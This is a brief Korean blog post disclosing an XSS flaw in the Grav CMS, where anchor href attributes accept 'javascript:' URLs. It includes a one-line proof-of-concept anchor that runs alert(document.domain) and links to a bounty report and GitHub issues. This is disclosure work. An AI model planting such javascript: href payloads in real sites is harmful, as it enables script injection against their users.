반응형
Target : getgrav/grav
https://github.com/getgrav/grav
Description
a 태그의 href 속성에 javascript: 를 넣을 수 있어 XSS 취약점이 발생한다.
PoC
<a href="javascript:alert(document.domain)">CLICK HERE TO EXPLOIT THIS XSS</a>
관련 링크
https://huntr.dev/bounties/67085545-331e-4469-90f3-a1a46a078d39/
https://github.com/getgrav/grav/issues/3298
https://github.com/getgrav/grav/issues/3175
반응형
'취약점.' 카테고리의 다른 글
'csv-plus' HTML Injection 취약점 #CVE-2022-21241 (0) | 2022.08.01 |
---|---|
'Bodymem' Prototye Pollution 취약점 #CVE-2022-25296 (0) | 2022.07.13 |
'Drogon' Arbitray File Write 취약점 #CVE-2022-25297 (0) | 2022.07.09 |
댓글